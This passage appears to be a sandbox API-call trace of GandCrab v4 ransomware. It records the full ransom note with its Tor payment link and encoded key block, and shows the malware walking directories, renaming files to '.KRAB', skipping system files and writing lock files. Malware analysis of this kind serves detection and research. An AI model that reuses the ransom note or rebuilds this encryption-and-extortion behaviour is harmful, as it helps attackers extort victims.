returned 0x3a8 [0085.320] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0085.321] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0085.323] CloseHandle (hObject=0x3a8) returned 1 [0085.323] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.323] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.324] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x20, wMilliseconds=0x210)) [0085.324] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.324] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0085.324] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0085.324] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\d2ca4a08d2ca4dee3d.lock") returned 67 [0085.324] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\skype\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0085.325] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.325] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.326] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\") returned 44 [0085.326] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\*" [0085.326] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0x1023378 [0085.326] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.326] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0085.326] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.326] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.326] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0085.326] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0085.326] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0085.326] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\d2ca4a08d2ca4dee3d.lock" [0085.326] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.327] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 72 [0085.327] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\d2ca4a08d2ca4dee3d.lock") returned 67 [0085.327] lstrlenW (lpString=".lock") returned 5 [0085.327] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.327] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0085.327] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.327] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.328] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0085.328] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0085.328] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0085.328] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\KRAB-DECRYPT.txt" [0085.328] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.328] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\KRAB-DECRYPT.txt.KRAB") returned 65 [0085.328] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\KRAB-DECRYPT.txt") returned 60 [0085.328] lstrlenW (lpString=".txt") returned 4 [0085.328] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.329] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0085.329] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.329] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\KRAB-DECRYPT.txt") returned 60 [0085.329] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\KRAB-DECRYPT.txt") returned 60 [0085.329] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0085.329] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0085.329] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0085.329] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0085.329] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0085.329] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0085.329] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0085.329] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0085.329] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0085.329] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0085.329] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.330] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0085.330] lstrcmpW (lpString1="RootTools", lpString2=".") returned 1 [0085.330] lstrcmpW (lpString1="RootTools", lpString2="..") returned 1 [0085.330] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\", lpString2="RootTools" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools" [0085.330] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\" [0085.330] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0085.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0085.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0085.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0085.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0085.331] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.331] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.331] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\\\KRAB-DECRYPT.txt") returned 71 [0085.331] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\skype\\roottools\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0085.332] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0085.332] WriteFile (in: hFile=0x474, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0085.333] CloseHandle (hObject=0x474) returned 1 [0085.333] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.333] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.333] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x20, wMilliseconds=0x210)) [0085.333] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.334] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0085.334] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0085.334] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\d2ca4a08d2ca4dee3d.lock") returned 77 [0085.334] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\skype\\roottools\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x474 [0085.336] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.336] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.336] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\") returned 54 [0085.336] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\*" [0085.336] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0x1023338 [0085.336] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.337] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0085.337] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.337] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.337] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0085.337] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0085.337] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0085.337] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\d2ca4a08d2ca4dee3d.lock" [0085.337] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.337] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 82 [0085.338] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\d2ca4a08d2ca4dee3d.lock") returned 77 [0085.338] lstrlenW (lpString=".lock") returned 5 [0085.338] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.338] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0085.338] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.338] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.339] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0085.339] lstrcmpW 